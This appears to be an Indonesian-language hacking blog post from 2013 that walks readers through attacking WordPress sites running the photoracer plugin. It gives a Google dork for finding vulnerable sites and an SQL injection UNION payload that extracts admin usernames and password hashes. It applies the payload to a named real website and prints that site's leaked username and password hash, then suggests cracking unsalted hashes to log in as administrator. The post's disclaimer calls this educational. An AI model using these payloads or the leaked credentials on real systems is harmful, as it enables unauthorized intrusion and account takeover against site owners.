Breaking News
Loading...
Thursday, March 28, 2013

Exploit WordPress

12:03 AM
pertama agan siapin kopi + rokok + cemilan cepuluh cebelas rolling on the floor
dork silahkan agan kembangkan lagi big grin kalo ane pake dork yang di bawah ini smug
dork: inurl:"wp-content/plugins/photoracer/viewimg.php?id="
  EXPLOIT +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
 agan masukan DORK tadi ke search engine google lalu agan cari lah targetnya yang bisa di eksekusi pake exploit dia atas  hypnotized

gini contoh targetnya yg ane ambil dari google thumbs up

http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=1

nah agan masukin dah exploit di atas tadi ke belakang angka nomer 1 no talking
maka jadinya seperti ini sob http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--.
nah gambar di atas tu yang ane tandain kotak warna merah itu user dan password nya gan  laughing
edbong:$P$BZJ19WTKx7P8mOQm6v7frYsuEsoIYg1

sayang sekali gan target ane password nya ada symbol $$ (salt) sampai saat ini ane belom nemuin cara crack password yg type begitu crying kalo agan tau cara decrypnya berbagi disini yah nanti ane update postingannya big grin
sukur sukur kalo agan nemu passwordnya yang type md5 ga pake salt langsung ajah deh agan crack di web md5 decrypter online lalu agan login sebagai admin web nya  applause

NB : tutor ini ane buat bukan untuk di salah gunakan....tutor ini untuk pembelajaran saja supaya admin admin web terutama admin web indonesia tercinta yang memakai CMS wordpress bisa meng antisipasi serangan dari defacer defacer nakal yang sedang keliaran mencari mangsanya,,ane ga bertanggung jawab jika tutor ini di salah gunakan dan merugikan orang lain apa lagi sampe agan ketangkep unit CYBER CRIME   nail bitingihh ngeri dehh gan ...

0 comments:

Post a Comment

Ads

Friends Blog

Musik

Cari Artikel Blog

 
Toggle Footer